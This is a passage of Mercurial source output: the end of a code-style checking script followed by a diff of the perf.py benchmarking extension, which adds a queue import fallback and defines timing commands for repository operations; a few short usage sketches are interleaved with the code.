639 640 post = re.sub(p, r, post)
640 641 nerrs = len(pats[0]) # nerr elements are errors
641 642 if warnings:
642 643 pats = pats[0] + pats[1]
643 644 else:
644 645 pats = pats[0]
645 646 # print post # uncomment to show filtered version
646 647
647 648 if debug:
648 649 print("Checking %s for %s" % (name, f))
649 650
650 651 prelines = None
651 652 errors = []
652 653 for i, pat in enumerate(pats):
653 654 if len(pat) == 3:
654 655 p, msg, ignore = pat
655 656 else:
656 657 p, msg = pat
657 658 ignore = None
658 659 if i >= nerrs:
659 660 msg = "warning: " + msg
660 661
661 662 pos = 0
662 663 n = 0
663 664 for m in p.finditer(post):
664 665 if prelines is None:
665 666 prelines = pre.splitlines()
666 667 postlines = post.splitlines(True)
667 668
668 669 start = m.start()
669 670 while n < len(postlines):
670 671 step = len(postlines[n])
671 672 if pos + step > start:
672 673 break
673 674 pos += step
674 675 n += 1
675 676 l = prelines[n]
676 677
677 678 if ignore and re.search(ignore, l, re.MULTILINE):
678 679 if debug:
679 680 print("Skipping %s for %s:%s (ignore pattern)" % (
680 681 name, f, n))
681 682 continue
682 683 bd = ""
683 684 if blame:
684 685 bd = 'working directory'
685 686 if not blamecache:
686 687 blamecache = getblame(f)
687 688 if n < len(blamecache):
688 689 bl, bu, br = blamecache[n]
689 690 if bl == l:
690 691 bd = '%s@%s' % (bu, br)
691 692
692 693 errors.append((f, lineno and n + 1, l, msg, bd))
693 694 result = False
694 695
695 696 errors.sort()
696 697 for e in errors:
697 698 logfunc(*e)
698 699 fc += 1
699 700 if maxerr and fc >= maxerr:
700 701 print(" (too many errors, giving up)")
701 702 break
702 703
703 704 return result
704 705
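A minimal driver sketch for this API (hypothetical call site; main() below does the same with option parsing):

    _preparepats()                    # compile the pattern tables once
    ok = checkfile('contrib/perf.py', maxerr=15, warnings=True)
    if not ok:
        sys.exit(1)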
705 706 def main():
706 707 parser = optparse.OptionParser("%prog [options] [files | -]")
707 708 parser.add_option("-w", "--warnings", action="store_true",
708 709 help="include warning-level checks")
709 710 parser.add_option("-p", "--per-file", type="int",
710 711 help="max warnings per file")
711 712 parser.add_option("-b", "--blame", action="store_true",
712 713 help="use annotate to generate blame info")
713 714 parser.add_option("", "--debug", action="store_true",
714 715 help="show debug information")
715 716 parser.add_option("", "--nolineno", action="store_false",
716 717 dest='lineno', help="don't show line numbers")
717 718
718 719 parser.set_defaults(per_file=15, warnings=False, blame=False, debug=False,
719 720 lineno=True)
720 721 (options, args) = parser.parse_args()
721 722
722 723 if len(args) == 0:
723 724 check = glob.glob("*")
724 725 elif args == ['-']:
725 726 # read file list from stdin
726 727 check = sys.stdin.read().splitlines()
727 728 else:
728 729 check = args
729 730
730 731 _preparepats()
731 732
732 733 ret = 0
733 734 for f in check:
734 735 if not checkfile(f, maxerr=options.per_file, warnings=options.warnings,
735 736 blame=options.blame, debug=options.debug,
736 737 lineno=options.lineno):
737 738 ret = 1
738 739 return ret
739 740
740 741 if __name__ == "__main__":
741 742 sys.exit(main())
--- a/contrib/perf.py
+++ b/contrib/perf.py
@@ -1,1764 +1,1774 @@
1 1 # perf.py - performance test routines
2 2 '''helper extension to measure performance'''
3 3
4 4 # "historical portability" policy of perf.py:
5 5 #
6 6 # We have to do:
7 7 # - make perf.py "loadable" with as many Mercurial versions as possible
8 8 # This doesn't mean that perf commands work correctly with that Mercurial.
9 9 # BTW, perf.py itself has been available since 1.1 (or eb240755386d).
10 10 # - make historical perf commands work correctly with as many
11 11 # Mercurial versions as possible
12 12 #
13 13 # We should also do, if possible at reasonable cost:
14 14 # - make recent perf commands for historical features work correctly
15 15 # with early Mercurial
16 16 #
17 17 # We don't have to do:
18 18 # - make perf commands for recent features work correctly with early
19 19 # Mercurial
20 20
21 21 from __future__ import absolute_import
22 22 import functools
23 23 import gc
24 24 import os
25 25 import random
26 26 import struct
27 27 import sys
28 28 import threading
29 29 import time
30 30 from mercurial import (
31 31 changegroup,
32 32 cmdutil,
33 33 commands,
34 34 copies,
35 35 error,
36 36 extensions,
37 37 mdiff,
38 38 merge,
39 39 revlog,
40 40 util,
41 41 )
42 42
43 43 # for "historical portability":
44 44 # try to import modules separately (in dict order), and ignore
45 45 # failure, because these aren't available with early Mercurial
46 46 try:
47 47 from mercurial import branchmap # since 2.5 (or bcee63733aad)
48 48 except ImportError:
49 49 pass
50 50 try:
51 51 from mercurial import obsolete # since 2.3 (or ad0d6c2b3279)
52 52 except ImportError:
53 53 pass
54 54 try:
55 55 from mercurial import registrar # since 3.7 (or 37d50250b696)
56 56 dir(registrar) # forcibly load it
57 57 except ImportError:
58 58 registrar = None
59 59 try:
60 60 from mercurial import repoview # since 2.5 (or 3a6ddacb7198)
61 61 except ImportError:
62 62 pass
63 63 try:
64 64 from mercurial import scmutil # since 1.9 (or 8b252e826c68)
65 65 except ImportError:
66 66 pass
67 67 try:
68 68 from mercurial import pycompat
69 69 getargspec = pycompat.getargspec # added to module after 4.5
70 70 except (ImportError, AttributeError):
71 71 import inspect
72 72 getargspec = inspect.getargspec
73 73
74 try:
75 # 4.7+
76 queue = pycompat.queue.Queue
77 except (AttributeError, ImportError):
78 # <4.7.
79 try:
80 queue = pycompat.queue
81 except (AttributeError, ImportError):
82 queue = util.queue
83
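After this fallback chain, the name 'queue' is bound to the Queue class on every supported Mercurial version, so later perf code can instantiate it uniformly; a sketch:

    q = queue()          # same spelling on 4.7+, <4.7, and pre-pycompat
    q.put(1)
    assert q.get() == 1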
74 84 # for "historical portability":
75 85 # define util.safehasattr forcibly, because util.safehasattr has been
76 86 # available since 1.9.3 (or 94b200a11cf7)
77 87 _undefined = object()
78 88 def safehasattr(thing, attr):
79 89 return getattr(thing, attr, _undefined) is not _undefined
80 90 setattr(util, 'safehasattr', safehasattr)
81 91
82 92 # for "historical portability":
83 93 # define util.timer forcibly, because util.timer has been available
84 94 # since ae5d60bb70c9
85 95 if safehasattr(time, 'perf_counter'):
86 96 util.timer = time.perf_counter
87 97 elif os.name == 'nt':
88 98 util.timer = time.clock
89 99 else:
90 100 util.timer = time.time
91 101
92 102 # for "historical portability":
93 103 # use locally defined empty option list, if formatteropts isn't
94 104 # available, because commands.formatteropts has been available since
95 105 # 3.2 (or 7a7eed5176a4), even though formatting itself has been
96 106 # available since 2.2 (or ae5f92e154d3)
97 107 formatteropts = getattr(cmdutil, "formatteropts",
98 108 getattr(commands, "formatteropts", []))
99 109
100 110 # for "historical portability":
101 111 # use locally defined option list, if debugrevlogopts isn't available,
102 112 # because commands.debugrevlogopts has been available since 3.7 (or
103 113 # 5606f7d0d063), even though cmdutil.openrevlog() has been available
104 114 # since 1.9 (or a79fea6b3e77).
105 115 revlogopts = getattr(cmdutil, "debugrevlogopts",
106 116 getattr(commands, "debugrevlogopts", [
107 117 ('c', 'changelog', False, ('open changelog')),
108 118 ('m', 'manifest', False, ('open manifest')),
109 119 ('', 'dir', False, ('open directory manifest')),
110 120 ]))
111 121
112 122 cmdtable = {}
113 123
114 124 # for "historical portability":
115 125 # define parsealiases locally, because cmdutil.parsealiases has been
116 126 # available since 1.5 (or 6252852b4332)
117 127 def parsealiases(cmd):
118 128 return cmd.lstrip("^").split("|")
119 129
120 130 if safehasattr(registrar, 'command'):
121 131 command = registrar.command(cmdtable)
122 132 elif safehasattr(cmdutil, 'command'):
123 133 command = cmdutil.command(cmdtable)
124 134 if 'norepo' not in getargspec(command).args:
125 135 # for "historical portability":
126 136 # wrap original cmdutil.command, because "norepo" option has
127 137 # been available since 3.1 (or 75a96326cecb)
128 138 _command = command
129 139 def command(name, options=(), synopsis=None, norepo=False):
130 140 if norepo:
131 141 commands.norepo += ' %s' % ' '.join(parsealiases(name))
132 142 return _command(name, list(options), synopsis)
133 143 else:
134 144 # for "historical portability":
135 145 # define "@command" annotation locally, because cmdutil.command
136 146 # has been available since 1.9 (or 2daa5179e73f)
137 147 def command(name, options=(), synopsis=None, norepo=False):
138 148 def decorator(func):
139 149 if synopsis:
140 150 cmdtable[name] = func, list(options), synopsis
141 151 else:
142 152 cmdtable[name] = func, list(options)
143 153 if norepo:
144 154 commands.norepo += ' %s' % ' '.join(parsealiases(name))
145 155 return func
146 156 return decorator
147 157
148 158 try:
149 159 import mercurial.registrar
150 160 import mercurial.configitems
151 161 configtable = {}
152 162 configitem = mercurial.registrar.configitem(configtable)
153 163 configitem('perf', 'presleep',
154 164 default=mercurial.configitems.dynamicdefault,
155 165 )
156 166 configitem('perf', 'stub',
157 167 default=mercurial.configitems.dynamicdefault,
158 168 )
159 169 configitem('perf', 'parentscount',
160 170 default=mercurial.configitems.dynamicdefault,
161 171 )
162 172 except (ImportError, AttributeError):
163 173 pass
164 174
165 175 def getlen(ui):
166 176 if ui.configbool("perf", "stub", False):
167 177 return lambda x: 1
168 178 return len
169 179
170 180 def gettimer(ui, opts=None):
171 181 """return a timer function and formatter: (timer, formatter)
172 182
173 183 This function exists to gather the creation of formatter in a single
174 184 place instead of duplicating it in all performance commands."""
175 185
176 186 # enforce an idle period before execution to counteract power management
177 187 # experimental config: perf.presleep
178 188 time.sleep(getint(ui, "perf", "presleep", 1))
179 189
180 190 if opts is None:
181 191 opts = {}
182 192 # redirect all to stderr unless buffer api is in use
183 193 if not ui._buffers:
184 194 ui = ui.copy()
185 195 uifout = safeattrsetter(ui, 'fout', ignoremissing=True)
186 196 if uifout:
187 197 # for "historical portability":
188 198 # ui.fout/ferr have been available since 1.9 (or 4e1ccd4c2b6d)
189 199 uifout.set(ui.ferr)
190 200
191 201 # get a formatter
192 202 uiformatter = getattr(ui, 'formatter', None)
193 203 if uiformatter:
194 204 fm = uiformatter('perf', opts)
195 205 else:
196 206 # for "historical portability":
197 207 # define formatter locally, because ui.formatter has been
198 208 # available since 2.2 (or ae5f92e154d3)
199 209 from mercurial import node
200 210 class defaultformatter(object):
201 211 """Minimized composition of baseformatter and plainformatter
202 212 """
203 213 def __init__(self, ui, topic, opts):
204 214 self._ui = ui
205 215 if ui.debugflag:
206 216 self.hexfunc = node.hex
207 217 else:
208 218 self.hexfunc = node.short
209 219 def __nonzero__(self):
210 220 return False
211 221 __bool__ = __nonzero__
212 222 def startitem(self):
213 223 pass
214 224 def data(self, **data):
215 225 pass
216 226 def write(self, fields, deftext, *fielddata, **opts):
217 227 self._ui.write(deftext % fielddata, **opts)
218 228 def condwrite(self, cond, fields, deftext, *fielddata, **opts):
219 229 if cond:
220 230 self._ui.write(deftext % fielddata, **opts)
221 231 def plain(self, text, **opts):
222 232 self._ui.write(text, **opts)
223 233 def end(self):
224 234 pass
225 235 fm = defaultformatter(ui, 'perf', opts)
226 236
227 237 # stub function, runs code only once instead of in a loop
228 238 # experimental config: perf.stub
229 239 if ui.configbool("perf", "stub", False):
230 240 return functools.partial(stub_timer, fm), fm
231 241 return functools.partial(_timer, fm), fm
232 242
233 243 def stub_timer(fm, func, title=None):
234 244 func()
235 245
236 246 def _timer(fm, func, title=None):
237 247 gc.collect()
238 248 results = []
239 249 begin = util.timer()
240 250 count = 0
241 251 while True:
242 252 ostart = os.times()
243 253 cstart = util.timer()
244 254 r = func()
245 255 cstop = util.timer()
246 256 ostop = os.times()
247 257 count += 1
248 258 a, b = ostart, ostop
249 259 results.append((cstop - cstart, b[0] - a[0], b[1]-a[1]))
250 260 if cstop - begin > 3 and count >= 100:
251 261 break
252 262 if cstop - begin > 10 and count >= 3:
253 263 break
254 264
255 265 fm.startitem()
256 266
257 267 if title:
258 268 fm.write('title', '! %s\n', title)
259 269 if r:
260 270 fm.write('result', '! result: %s\n', r)
261 271 m = min(results)
262 272 fm.plain('!')
263 273 fm.write('wall', ' wall %f', m[0])
264 274 fm.write('comb', ' comb %f', m[1] + m[2])
265 275 fm.write('user', ' user %f', m[1])
266 276 fm.write('sys', ' sys %f', m[2])
267 277 fm.write('count', ' (best of %d)', count)
268 278 fm.plain('\n')
269 279
270 280 # utilities for historical portability
271 281
272 282 def getint(ui, section, name, default):
273 283 # for "historical portability":
274 284 # ui.configint has been available since 1.9 (or fa2b596db182)
275 285 v = ui.config(section, name, None)
276 286 if v is None:
277 287 return default
278 288 try:
279 289 return int(v)
280 290 except ValueError:
281 291 raise error.ConfigError(("%s.%s is not an integer ('%s')")
282 292 % (section, name, v))
283 293
284 294 def safeattrsetter(obj, name, ignoremissing=False):
285 295 """Ensure that 'obj' has 'name' attribute before subsequent setattr
286 296
287 297 This function aborts if 'obj' doesn't have the 'name' attribute at
288 298 runtime. This avoids overlooking future removal of an attribute,
289 299 which would silently break the assumptions of a performance measurement.
290 300
291 301 This function returns an object that can (1) assign a new value to
292 302 the attribute, and (2) restore the attribute's original value.
293 303
294 304 If 'ignoremissing' is true, a missing 'name' attribute doesn't cause
295 305 an abort, and this function returns None. This is useful for
296 306 examining an attribute that isn't guaranteed to exist in all
297 307 Mercurial versions.
298 308 """
299 309 if not util.safehasattr(obj, name):
300 310 if ignoremissing:
301 311 return None
302 312 raise error.Abort(("missing attribute %s of %s might break assumption"
303 313 " of performance measurement") % (name, obj))
304 314
305 315 origvalue = getattr(obj, name)
306 316 class attrutil(object):
307 317 def set(self, newvalue):
308 318 setattr(obj, name, newvalue)
309 319 def restore(self):
310 320 setattr(obj, name, origvalue)
311 321
312 322 return attrutil()
313 323
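A sketch of the set/restore protocol described above, mirroring the ui.fout redirection performed in gettimer():

    fout = safeattrsetter(ui, 'fout', ignoremissing=True)
    if fout:
        fout.set(ui.ferr)      # redirect output during the measurement
        # ... timed code runs here ...
        fout.restore()         # put the original attribute back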
314 324 # utilities to examine each internal API changes
315 325
316 326 def getbranchmapsubsettable():
317 327 # for "historical portability":
318 328 # subsettable is defined in:
319 329 # - branchmap since 2.9 (or 175c6fd8cacc)
320 330 # - repoview since 2.5 (or 59a9f18d4587)
321 331 for mod in (branchmap, repoview):
322 332 subsettable = getattr(mod, 'subsettable', None)
323 333 if subsettable:
324 334 return subsettable
325 335
326 336 # bisecting in bcee63733aad::59a9f18d4587 can reach here (both
327 337 # branchmap and repoview modules exist, but subsettable attribute
328 338 # doesn't)
329 339 raise error.Abort(("perfbranchmap not available with this Mercurial"),
330 340 hint="use 2.5 or later")
331 341
332 342 def getsvfs(repo):
333 343 """Return appropriate object to access files under .hg/store
334 344 """
335 345 # for "historical portability":
336 346 # repo.svfs has been available since 2.3 (or 7034365089bf)
337 347 svfs = getattr(repo, 'svfs', None)
338 348 if svfs:
339 349 return svfs
340 350 else:
341 351 return getattr(repo, 'sopener')
342 352
343 353 def getvfs(repo):
344 354 """Return appropriate object to access files under .hg
345 355 """
346 356 # for "historical portability":
347 357 # repo.vfs has been available since 2.3 (or 7034365089bf)
348 358 vfs = getattr(repo, 'vfs', None)
349 359 if vfs:
350 360 return vfs
351 361 else:
352 362 return getattr(repo, 'opener')
353 363
354 364 def repocleartagscachefunc(repo):
355 365 """Return the function to clear tags cache according to repo internal API
356 366 """
357 367 if util.safehasattr(repo, '_tagscache'): # since 2.0 (or 9dca7653b525)
358 368 # in this case, setattr(repo, '_tagscache', None) or so isn't
359 369 # correct way to clear tags cache, because existing code paths
360 370 # expect _tagscache to be a structured object.
361 371 def clearcache():
362 372 # _tagscache has been filteredpropertycache since 2.5 (or
363 373 # 98c867ac1330), and delattr() can't work in such case
364 374 if '_tagscache' in vars(repo):
365 375 del repo.__dict__['_tagscache']
366 376 return clearcache
367 377
368 378 repotags = safeattrsetter(repo, '_tags', ignoremissing=True)
369 379 if repotags: # since 1.4 (or 5614a628d173)
370 380 return lambda : repotags.set(None)
371 381
372 382 repotagscache = safeattrsetter(repo, 'tagscache', ignoremissing=True)
373 383 if repotagscache: # since 0.6 (or d7df759d0e97)
374 384 return lambda : repotagscache.set(None)
375 385
376 386 # Mercurial earlier than 0.6 (or d7df759d0e97) logically reaches
377 387 # this point, but it isn't so problematic, because:
378 388 # - repo.tags of such Mercurial isn't "callable", and repo.tags()
379 389 # in perftags() causes failure soon
380 390 # - perf.py itself has been available since 1.1 (or eb240755386d)
381 391 raise error.Abort(("tags API of this hg command is unknown"))
382 392
383 393 # utilities to clear cache
384 394
385 395 def clearfilecache(repo, attrname):
386 396 unfi = repo.unfiltered()
387 397 if attrname in vars(unfi):
388 398 delattr(unfi, attrname)
389 399 unfi._filecache.pop(attrname, None)
390 400
391 401 # perf commands
392 402
393 403 @command('perfwalk', formatteropts)
394 404 def perfwalk(ui, repo, *pats, **opts):
395 405 timer, fm = gettimer(ui, opts)
396 406 m = scmutil.match(repo[None], pats, {})
397 407 timer(lambda: len(list(repo.dirstate.walk(m, subrepos=[], unknown=True,
398 408 ignored=False))))
399 409 fm.end()
400 410
401 411 @command('perfannotate', formatteropts)
402 412 def perfannotate(ui, repo, f, **opts):
403 413 timer, fm = gettimer(ui, opts)
404 414 fc = repo['.'][f]
405 415 timer(lambda: len(fc.annotate(True)))
406 416 fm.end()
407 417
408 418 @command('perfstatus',
409 419 [('u', 'unknown', False,
410 420 'ask status to look for unknown files')] + formatteropts)
411 421 def perfstatus(ui, repo, **opts):
412 422 #m = match.always(repo.root, repo.getcwd())
413 423 #timer(lambda: sum(map(len, repo.dirstate.status(m, [], False, False,
414 424 # False))))
415 425 timer, fm = gettimer(ui, opts)
416 426 timer(lambda: sum(map(len, repo.status(unknown=opts['unknown']))))
417 427 fm.end()
418 428
419 429 @command('perfaddremove', formatteropts)
420 430 def perfaddremove(ui, repo, **opts):
421 431 timer, fm = gettimer(ui, opts)
422 432 try:
423 433 oldquiet = repo.ui.quiet
424 434 repo.ui.quiet = True
425 435 matcher = scmutil.match(repo[None])
426 436 opts['dry_run'] = True
427 437 timer(lambda: scmutil.addremove(repo, matcher, "", opts))
428 438 finally:
429 439 repo.ui.quiet = oldquiet
430 440 fm.end()
431 441
432 442 def clearcaches(cl):
433 443 # behave somewhat consistently across internal API changes
434 444 if util.safehasattr(cl, 'clearcaches'):
435 445 cl.clearcaches()
436 446 elif util.safehasattr(cl, '_nodecache'):
437 447 from mercurial.node import nullid, nullrev
438 448 cl._nodecache = {nullid: nullrev}
439 449 cl._nodepos = None
440 450
441 451 @command('perfheads', formatteropts)
442 452 def perfheads(ui, repo, **opts):
443 453 timer, fm = gettimer(ui, opts)
444 454 cl = repo.changelog
445 455 def d():
446 456 len(cl.headrevs())
447 457 clearcaches(cl)
448 458 timer(d)
449 459 fm.end()
450 460
451 461 @command('perftags', formatteropts)
452 462 def perftags(ui, repo, **opts):
453 463 import mercurial.changelog
454 464 import mercurial.manifest
455 465 timer, fm = gettimer(ui, opts)
456 466 svfs = getsvfs(repo)
457 467 repocleartagscache = repocleartagscachefunc(repo)
458 468 def t():
459 469 repo.changelog = mercurial.changelog.changelog(svfs)
460 470 repo.manifestlog = mercurial.manifest.manifestlog(svfs, repo)
461 471 repocleartagscache()
462 472 return len(repo.tags())
463 473 timer(t)
464 474 fm.end()
465 475
466 476 @command('perfancestors', formatteropts)
467 477 def perfancestors(ui, repo, **opts):
468 478 timer, fm = gettimer(ui, opts)
469 479 heads = repo.changelog.headrevs()
470 480 def d():
471 481 for a in repo.changelog.ancestors(heads):
472 482 pass
473 483 timer(d)
474 484 fm.end()
475 485
476 486 @command('perfancestorset', formatteropts)
477 487 def perfancestorset(ui, repo, revset, **opts):
478 488 timer, fm = gettimer(ui, opts)
479 489 revs = repo.revs(revset)
480 490 heads = repo.changelog.headrevs()
481 491 def d():
482 492 s = repo.changelog.ancestors(heads)
483 493 for rev in revs:
484 494 rev in s
485 495 timer(d)
486 496 fm.end()
487 497
488 498 @command('perfbookmarks', formatteropts)
489 499 def perfbookmarks(ui, repo, **opts):
490 500 """benchmark parsing bookmarks from disk to memory"""
491 501 timer, fm = gettimer(ui, opts)
492 502 def d():
493 503 clearfilecache(repo, '_bookmarks')
494 504 repo._bookmarks
495 505 timer(d)
496 506 fm.end()
497 507
498 508 @command('perfbundleread', formatteropts, 'BUNDLE')
499 509 def perfbundleread(ui, repo, bundlepath, **opts):
500 510 """Benchmark reading of bundle files.
501 511
502 512 This command is meant to isolate the I/O part of bundle reading as
503 513 much as possible.
504 514 """
505 515 from mercurial import (
506 516 bundle2,
507 517 exchange,
508 518 streamclone,
509 519 )
510 520
511 521 def makebench(fn):
512 522 def run():
513 523 with open(bundlepath, 'rb') as fh:
514 524 bundle = exchange.readbundle(ui, fh, bundlepath)
515 525 fn(bundle)
516 526
517 527 return run
518 528
519 529 def makereadnbytes(size):
520 530 def run():
521 531 with open(bundlepath, 'rb') as fh:
522 532 bundle = exchange.readbundle(ui, fh, bundlepath)
523 533 while bundle.read(size):
524 534 pass
525 535
526 536 return run
527 537
528 538 def makestdioread(size):
529 539 def run():
530 540 with open(bundlepath, 'rb') as fh:
531 541 while fh.read(size):
532 542 pass
533 543
534 544 return run
535 545
536 546 # bundle1
537 547
538 548 def deltaiter(bundle):
539 549 for delta in bundle.deltaiter():
540 550 pass
541 551
542 552 def iterchunks(bundle):
543 553 for chunk in bundle.getchunks():
544 554 pass
545 555
546 556 # bundle2
547 557
548 558 def forwardchunks(bundle):
549 559 for chunk in bundle._forwardchunks():
550 560 pass
551 561
552 562 def iterparts(bundle):
553 563 for part in bundle.iterparts():
554 564 pass
555 565
556 566 def iterpartsseekable(bundle):
557 567 for part in bundle.iterparts(seekable=True):
558 568 pass
559 569
560 570 def seek(bundle):
561 571 for part in bundle.iterparts(seekable=True):
562 572 part.seek(0, os.SEEK_END)
563 573
564 574 def makepartreadnbytes(size):
565 575 def run():
566 576 with open(bundlepath, 'rb') as fh:
567 577 bundle = exchange.readbundle(ui, fh, bundlepath)
568 578 for part in bundle.iterparts():
569 579 while part.read(size):
570 580 pass
571 581
572 582 return run
573 583
574 584 benches = [
575 585 (makestdioread(8192), 'read(8k)'),
576 586 (makestdioread(16384), 'read(16k)'),
577 587 (makestdioread(32768), 'read(32k)'),
578 588 (makestdioread(131072), 'read(128k)'),
579 589 ]
580 590
581 591 with open(bundlepath, 'rb') as fh:
582 592 bundle = exchange.readbundle(ui, fh, bundlepath)
583 593
584 594 if isinstance(bundle, changegroup.cg1unpacker):
585 595 benches.extend([
586 596 (makebench(deltaiter), 'cg1 deltaiter()'),
587 597 (makebench(iterchunks), 'cg1 getchunks()'),
588 598 (makereadnbytes(8192), 'cg1 read(8k)'),
589 599 (makereadnbytes(16384), 'cg1 read(16k)'),
590 600 (makereadnbytes(32768), 'cg1 read(32k)'),
591 601 (makereadnbytes(131072), 'cg1 read(128k)'),
592 602 ])
593 603 elif isinstance(bundle, bundle2.unbundle20):
594 604 benches.extend([
595 605 (makebench(forwardchunks), 'bundle2 forwardchunks()'),
596 606 (makebench(iterparts), 'bundle2 iterparts()'),
597 607 (makebench(iterpartsseekable), 'bundle2 iterparts() seekable'),
598 608 (makebench(seek), 'bundle2 part seek()'),
599 609 (makepartreadnbytes(8192), 'bundle2 part read(8k)'),
600 610 (makepartreadnbytes(16384), 'bundle2 part read(16k)'),
601 611 (makepartreadnbytes(32768), 'bundle2 part read(32k)'),
602 612 (makepartreadnbytes(131072), 'bundle2 part read(128k)'),
603 613 ])
604 614 elif isinstance(bundle, streamclone.streamcloneapplier):
605 615 raise error.Abort('stream clone bundles not supported')
606 616 else:
607 617 raise error.Abort('unhandled bundle type: %s' % type(bundle))
608 618
609 619 for fn, title in benches:
610 620 timer, fm = gettimer(ui, opts)
611 621 timer(fn, title=title)
612 622 fm.end()
613 623
614 624 @command('perfchangegroupchangelog', formatteropts +
615 625 [('', 'version', '02', 'changegroup version'),
616 626 ('r', 'rev', '', 'revisions to add to changegroup')])
617 627 def perfchangegroupchangelog(ui, repo, version='02', rev=None, **opts):
618 628 """Benchmark producing a changelog group for a changegroup.
619 629
620 630 This measures the time spent processing the changelog during a
621 631 bundle operation. This occurs during `hg bundle` and on a server
622 632 processing a `getbundle` wire protocol request (handles clones
623 633 and pull requests).
624 634
625 635 By default, all revisions are added to the changegroup.
626 636 """
627 637 cl = repo.changelog
628 638 revs = [cl.lookup(r) for r in repo.revs(rev or 'all()')]
629 639 bundler = changegroup.getbundler(version, repo)
630 640
631 641 def lookup(node):
632 642 # The real bundler reads the revision in order to access the
633 643 # manifest node and files list. Do that here.
634 644 cl.read(node)
635 645 return node
636 646
637 647 def d():
638 648 for chunk in bundler.group(revs, cl, lookup):
639 649 pass
640 650
641 651 timer, fm = gettimer(ui, opts)
642 652 timer(d)
643 653 fm.end()
644 654
645 655 @command('perfdirs', formatteropts)
646 656 def perfdirs(ui, repo, **opts):
647 657 timer, fm = gettimer(ui, opts)
648 658 dirstate = repo.dirstate
649 659 'a' in dirstate
650 660 def d():
651 661 dirstate.hasdir('a')
652 662 del dirstate._map._dirs
653 663 timer(d)
654 664 fm.end()
655 665
656 666 @command('perfdirstate', formatteropts)
657 667 def perfdirstate(ui, repo, **opts):
658 668 timer, fm = gettimer(ui, opts)
659 669 "a" in repo.dirstate
660 670 def d():
661 671 repo.dirstate.invalidate()
662 672 "a" in repo.dirstate
663 673 timer(d)
664 674 fm.end()
665 675
666 676 @command('perfdirstatedirs', formatteropts)
667 677 def perfdirstatedirs(ui, repo, **opts):
668 678 timer, fm = gettimer(ui, opts)
669 679 "a" in repo.dirstate
670 680 def d():
671 681 repo.dirstate.hasdir("a")
672 682 del repo.dirstate._map._dirs
673 683 timer(d)
674 684 fm.end()
675 685
676 686 @command('perfdirstatefoldmap', formatteropts)
677 687 def perfdirstatefoldmap(ui, repo, **opts):
678 688 timer, fm = gettimer(ui, opts)
679 689 dirstate = repo.dirstate
680 690 'a' in dirstate
681 691 def d():
682 692 dirstate._map.filefoldmap.get('a')
683 693 del dirstate._map.filefoldmap
684 694 timer(d)
685 695 fm.end()
686 696
687 697 @command('perfdirfoldmap', formatteropts)
688 698 def perfdirfoldmap(ui, repo, **opts):
689 699 timer, fm = gettimer(ui, opts)
690 700 dirstate = repo.dirstate
691 701 'a' in dirstate
692 702 def d():
693 703 dirstate._map.dirfoldmap.get('a')
694 704 del dirstate._map.dirfoldmap
695 705 del dirstate._map._dirs
696 706 timer(d)
697 707 fm.end()
698 708
699 709 @command('perfdirstatewrite', formatteropts)
700 710 def perfdirstatewrite(ui, repo, **opts):
701 711 timer, fm = gettimer(ui, opts)
702 712 ds = repo.dirstate
703 713 "a" in ds
704 714 def d():
705 715 ds._dirty = True
706 716 ds.write(repo.currenttransaction())
707 717 timer(d)
708 718 fm.end()
709 719
710 720 @command('perfmergecalculate',
711 721 [('r', 'rev', '.', 'rev to merge against')] + formatteropts)
712 722 def perfmergecalculate(ui, repo, rev, **opts):
713 723 timer, fm = gettimer(ui, opts)
714 724 wctx = repo[None]
715 725 rctx = scmutil.revsingle(repo, rev, rev)
716 726 ancestor = wctx.ancestor(rctx)
717 727 # we don't want working dir files to be stat'd in the benchmark, so prime
718 728 # that cache
719 729 wctx.dirty()
720 730 def d():
721 731 # acceptremote is True because we don't want prompts in the middle of
722 732 # our benchmark
723 733 merge.calculateupdates(repo, wctx, rctx, [ancestor], False, False,
724 734 acceptremote=True, followcopies=True)
725 735 timer(d)
726 736 fm.end()
727 737
728 738 @command('perfpathcopies', [], "REV REV")
729 739 def perfpathcopies(ui, repo, rev1, rev2, **opts):
730 740 timer, fm = gettimer(ui, opts)
731 741 ctx1 = scmutil.revsingle(repo, rev1, rev1)
732 742 ctx2 = scmutil.revsingle(repo, rev2, rev2)
733 743 def d():
734 744 copies.pathcopies(ctx1, ctx2)
735 745 timer(d)
736 746 fm.end()
737 747
738 748 @command('perfphases',
739 749 [('', 'full', False, 'include file reading time too'),
740 750 ], "")
741 751 def perfphases(ui, repo, **opts):
742 752 """benchmark phasesets computation"""
743 753 timer, fm = gettimer(ui, opts)
744 754 _phases = repo._phasecache
745 755 full = opts.get('full')
746 756 def d():
747 757 phases = _phases
748 758 if full:
749 759 clearfilecache(repo, '_phasecache')
750 760 phases = repo._phasecache
751 761 phases.invalidate()
752 762 phases.loadphaserevs(repo)
753 763 timer(d)
754 764 fm.end()
755 765
756 766 @command('perfmanifest', [], 'REV')
757 767 def perfmanifest(ui, repo, rev, **opts):
758 768 timer, fm = gettimer(ui, opts)
759 769 ctx = scmutil.revsingle(repo, rev, rev)
760 770 t = ctx.manifestnode()
761 771 def d():
762 772 repo.manifestlog.clearcaches()
763 773 repo.manifestlog[t].read()
764 774 timer(d)
765 775 fm.end()
766 776
767 777 @command('perfchangeset', formatteropts)
768 778 def perfchangeset(ui, repo, rev, **opts):
769 779 timer, fm = gettimer(ui, opts)
770 780 n = scmutil.revsingle(repo, rev).node()
771 781 def d():
772 782 repo.changelog.read(n)
773 783 #repo.changelog._cache = None
774 784 timer(d)
775 785 fm.end()
776 786
777 787 @command('perfindex', formatteropts)
778 788 def perfindex(ui, repo, **opts):
779 789 import mercurial.revlog
780 790 timer, fm = gettimer(ui, opts)
781 791 mercurial.revlog._prereadsize = 2**24 # disable lazy parser in old hg
782 792 n = repo["tip"].node()
783 793 svfs = getsvfs(repo)
784 794 def d():
785 795 cl = mercurial.revlog.revlog(svfs, "00changelog.i")
786 796 cl.rev(n)
787 797 timer(d)
788 798 fm.end()
789 799
790 800 @command('perfstartup', formatteropts)
791 801 def perfstartup(ui, repo, **opts):
792 802 timer, fm = gettimer(ui, opts)
793 803 cmd = sys.argv[0]
794 804 def d():
795 805 if os.name != 'nt':
796 806 os.system("HGRCPATH= %s version -q > /dev/null" % cmd)
797 807 else:
798 808 os.environ['HGRCPATH'] = ' '
799 809 os.system("%s version -q > NUL" % cmd)
800 810 timer(d)
801 811 fm.end()
802 812
803 813 @command('perfparents', formatteropts)
804 814 def perfparents(ui, repo, **opts):
805 815 timer, fm = gettimer(ui, opts)
806 816 # control the number of commits perfparents iterates over
807 817 # experimental config: perf.parentscount
808 818 count = getint(ui, "perf", "parentscount", 1000)
809 819 if len(repo.changelog) < count:
